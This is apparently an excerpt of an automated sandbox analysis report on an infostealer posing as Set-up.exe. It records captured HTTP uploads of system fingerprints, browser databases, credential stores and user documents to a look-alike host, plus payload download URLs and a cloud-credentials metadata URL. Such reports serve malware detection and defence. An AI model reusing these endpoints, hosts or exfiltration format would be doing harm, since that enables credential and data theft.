Source: global traffic	HTTP traffic detected: POST /Up/p HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 489Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 ff 07 87 57 37 01 00 00 37 01 00 00 28 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 7b 22 6f 22 3a 22 57 69 6e 64 6f 77 73 20 31 30 22 2c 22 75 6e 22 3a 22 61 6c 66 6f 6e 73 22 2c 22 70 22 3a 22 41 4c 46 4f 4e 53 2d 50 43 22 2c 22 61 22 3a 22 78 36 34 22 2c 22 63 22 3a 34 2c 22 6c 22 3a 22 31 37 34 36 38 35 37 31 32 36 31 34 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 62 74 22 3a 22 5a 41 45 42 41 22 2c 22 68 69 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 64 6e 22 3a 22 6e 75 6c 6c 22 2c 22 64 70 22 3a 22 32 32 32 22 2c 22 73 22 3a 22 31 32 38 30 78 31 30 32 34 22 2c 22 72 22 3a 34 30 39 35 2c 22 65 6c 22 3a 66 61 6c 73 65 2c 22 6c 74 22 3a 22 6e 75 6c 6c 22 2c 22 69 73 22 3a 5b 5d 2c 22 6c 69 22 3a 5b 5d 2c 22 70 6c 22 3a 5b 5d 2c 22 67 22 3a 5b 22 4d 69 63 72 6f 73 6f 66 74 20 42 61 73 69 63 20 44 69 73 70 6c 61 79 20 41 64 61 70 74 65 72 22 5d 7d 50 4b 01 02 14 00 14 00 00 00 00 00 5c 64 21 52 ff 07 87 57 37 01 00 00 37 01 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 50 4b 05 06 00 00 00 00 01 00 01 00 56 00 00 00 7d 01 00 00 00 00 Data Ascii: PK\d!RW77(f1575b64-8492-4e8b-b102-4d26e8c70371.txt{"o":"Windows 10","un":"user","p":"user-PC","a":"x64","c":4,"l":"1746857126149e146be9-c76a-4720-bcdb-53011b87bd06","bt":"ZAEBA","hi":"9e146be9-c76a-4720-bcdb-53011b87bd06","dn":"null","dp":"222","s":"1280x1024","r":4095,"el":false,"lt":"null","is":[],"li":[],"pl":[],"g":["Microsoft Basic Display Adapter"]}PK\d!RW77(f1575b64-8492-4e8b-b102-4d26e8c70371.txtPKV}
Source: global traffic	HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 139949Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 ca 34 d2 61 00 20 02 00 00 20 02 00 0f 00 00 00 62 2f 63 38 2f 30 2f 57 65 62 20 44 61 74 61 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 05 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 4a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 2e 7a 70 05 00 00 00 05 07 e7 00 00 00 00 3c 07 fb 07 f6 07 f1 07 ec 07 e7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 197293Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 70 c7 0d af 00 00 03 00 00 00 03 00 0f 00 00 00 62 2f 63 39 2f 30 2f 57 65 62 20 44 61 74 61 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 09 00 00 00 59 00 00 00 00 00 00 00 00 00 00 00 36 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 00 2e 6a d0 05 00 00 00 08 07 d8 00 00 00 00 57 07 fb 07 f6 07 f1 07 ec 07 e7 07 e2 07 dd 07 d8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 524954Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 33 2e 64 62 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 90 a5 8e 8e 00 80 04 00 00 80 04 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 34 2e 64 62 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 80 00 01 01 00 40 20 20 00 00 00 02 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 2e 6a d0 0d 7f f8 00 08 7a 3c 00 7b ee 7f c3 7b a9 7b 61 7b 1f 7a db 7a 3c 7a aa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: POST /Up/g HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 14530Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 61 52 b7 be 30 00 00 00 30 00 00 00 28 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 31 37 34 36 38 35 37 31 32 36 31 34 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 73 f2 4d 06 02 04 00 00 02 04 00 00 33 00 00 00 67 2f 55 73 65 72 73 2f 61 6c 66 6f 6e 73 2f 44 6f 63 75 6d 65 6e 74 73 2f 53 51 52 4b 48 4e 42 4e 59 4e 2f 53 51 52 4b 48 4e 42 4e 59 4e 2e 64 6f 63 78 53 51 52 4b 48 4e 42 4e 59 4e 45 54 44 43 49 4c 57 49 4b 4c 4e 52 59 48 4a 5a 55 50 43 59 56 54 4a 4a 4b 41 42 59 59 4e 56 45 4a 5a 42 46 4a 47 49 55 5a 45 46 55 48 43 4f 5a 5a 49 53 51 45 4c 5a 55 4c 4d 41 50 46 49 42 55 53 56 47 47 53 58 53 56 5a 52 4e 4a 58 46 56 55 45 49 4b 42 51 4e 41 52 45 4c 4b 4a 45 4a 5a 54 45 42 47 58 49 46 54 42 47 44 58 42 53 59 46 4a 4b 46 49 43 4d 4c 4f 4d 48 5a 5a 53 49 4a 4d 50 49 58 5a 4d 51 55 4c 48 41 5a 57 4e 4f 43 53 43 4c 57 54 4e 4a 4d 43 47 56 51 41 4f 50 59 54 5a 56 52 4c 43 4b 53 55 50 53 4d 57 56 4f 46 43 50 4a 41 4f 4e 47 51 42 50 4c 4d 51 55 54 5a 53 46 59 52 49 42 44 5a 57 42 58 49 45 44 4a 49 53 4d 43 54 47 54 59 4b 45 49 58 57 56 44 56 4f 47 4d 46 55 4e 52 4a 44 4e 45 47 4a 4c 56 57 4e 41 43 42 42 47 49 49 52 54 41 48 47 55 4d 53 4c 53 49 5a 4e 47 54 52 41 55 47 4d 5a 54 56 47 4c 49 41 4b 4c 4c 4b 4a 47 4b 42 4d 58 49 46 50 4f 59 43 51 58 4a 5a 4b 4a 48 54 4c 4e 5a 47 44 43 4c 4d 58 54 59 4f 42 47 46 41 50 4f 51 43 4a 47 52 41 4b 4f 52 4b 47 47 57 50 42 4f 4a 4c 4f 5a 41 54 4b 44 5a 59 46 44 53 4f 4e 55 5a 4f 47 42 46 52 44 42 55 4b 5a 54 56 59 5a 47 58 44 45 57 55 4f 58 4e 57 48 4d 4f 49 42 56 4f 57 4e 57 46 47 42 48 53 44 54 51 51 4b 58 57 5a 45 48 51 4c 41 59 49 58 4f 56 5a 45 45 5a 4e 45 53 4b 4b 57 49 54 59 50 49 44 43 4d 46 48 54 57 56 48 4d 48 46 43 47 4e 45 42 4e 56 42 53 53 51 48 4d 52 53 57 4c 48 56 4d 41 5a 45 52 49 55 46 54 52 58 45 56 5a 48 4b 52 58 57 4f 4d 47 45 54 4a 4a 46 42 52 4c 46 49 42 52 47 4c 41 51 4b 4c 44 46 5a 45 47 48 4c 5a 53 56 41 4d 58 4d 4e 43 43 55 52 4f 58 47 51 4f 4d 44 51 4a 53 4b 55 4e 4f 47 4c 47 59 59 54 56 41 42 45 53 49 44 48 41 53 44 52 41 43 4c 4f 46 45 57 47 50 59 4c 45 4f 52 58 53 59 44 52 44 47 50 47 4f 58 48 49 41 49 53 42 5a 42 44 52 4e 56 51 4a 58 58 49 42 4e 42 58 4d 44 53 4b 58 50 42 53 43 47 4b 47 50 41 53 47 4e 4f 49 44 4b 49 42 46 4a 57 55 49 52 51 48 5a 4c 58 5a 51 56 48 55 45 48 4d 48 54 52 44 57 4b 47 4a 56 51 48 57 46 51 45 42 4a 49 42 51 4c 44 57 51 48 4f 51 4c 58 53 50 46 50 4c 57 50 59 5a 52 4f 59 44 41 51 4f 4f 4f 59 4b 54 50 56 46 51 58 4c 4d 4c 52 44 59 53 56 58 56 41 57 43 45 47 56 53 48 47 44 56 53 48 4f 4e 51 55 41 56 43 42 42 48 4a 52 54 49 4a 41 59 58 55 49 4c 48 4e 47 48 49 58 46 4a 50 4a 46 41 55 44 49 4a 46 4

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3

Source: global traffic

HTTP traffic detected: GET /ujs/f1575b64-8492-4e8b-b102-4d26e8c70371 HTTP/1.1Host: mcrsftuptade.proConnection: close

Source: global traffic

DNS traffic detected: DNS query: c.pki.goog

Source: unknown

Source: Set-up.exe	String found in binary or memory: http://169.254.169.254/latest/meta-data/iam/security-credentials/Retrieving
Source: Set-up.exe	String found in binary or memory: http://XXXXXXwinscp.net/
Source: Set-up.exe	String found in binary or memory: http://XXXXwinscp.net/forum/
Source: Set-up.exe	String found in binary or memory: http://acs.amazonaws.com/groups/global/AllUsers
Source: Set-up.exe	String found in binary or memory: http://acs.amazonaws.com/groups/global/AuthenticatedUsers
Source: Set-up.exe	String found in binary or memory: http://acs.amazonaws.com/groups/s3/LogDelivery
Source: Set-up.exe	String found in binary or memory: http://apache.org/dav/props/
Source: Set-up.exe	String found in binary or memory: http://apache.org/dav/props/T
Source: Set-up.exe	String found in binary or memory: http://apache.org/dav/propset/fs/1
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://h1.coldwalk.top/amshm.bin
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://h1.coldwalk.top/sh.ext.exe.bin
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://h1.coldwalk.top/shark.bin
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Set-up.exe	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Set-up.exe	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net
Source: Set-up.exe	String found in binary or memory: http://webdav.org/neon/hooks/proxy-auth
Source: Set-up.exe	String found in binary or memory: http://webdav.org/neon/hooks/proxy-authProxy-AuthorizationProxy-AuthenticateProxy-Authentication-Inf
Source: Set-up.exe	String found in binary or memory: http://webdav.org/neon/hooks/server-auth
Source: Set-up.exe	String found in binary or memory: http://webdav.org/neon/hooks/server-authAuthorizationWWW-AuthenticateAuthentication-InfoCould
Source: Set-up.exe	String found in binary or memory: http://webdav.org/neon/hooks/server-authhttp://webdav.org/neon/hooks/proxy-authhttp://webdav.org/neo
Source: Set-up.exe	String found in binary or memory: http://webdav.org/neon/hooks/webdav-locking
Source: Set-up.exe	String found in binary or memory: http://webdav.org/neon/hooks/webdav-lockingHas
Source: Set-up.exe	String found in binary or memory: http://webdav.org/neon/hooks/webdav-lockinghttp://webdav.org/neon/hooks/webdav-lockingLocked
Source: Set-up.exe	String found in binary or memory: http://webdav.org/neon/hooks/webdav-lockinghttp://webdav.org/neon/hooks/webdav-lockinglock:
Source: Set-up.exe	String found in binary or memory: http://winscp.net/schema/session/1.0
Source: Set-up.exe	String found in binary or memory: http://www.borland.com/namespaces/Types
Source: Set-up.exe	String found in binary or memory: http://www.webdav.org/neon/hooks/http-passport-req
Source: Set-up.exe	String found in binary or memory: http://www.webdav.org/neon/hooks/http-passport-reqWWW-AuthenticatePassport1.4Passport1.4http://www.w
Source: Set-up.exe	String found in binary or memory: http://www.webdav.org/neon/hooks/http-redirect
Source: Set-up.exe	String found in binary or memory: http://www.webdav.org/neon/hooks/http-redirecthttp://www.webdav.org/neon/hooks/http-redirectAborted
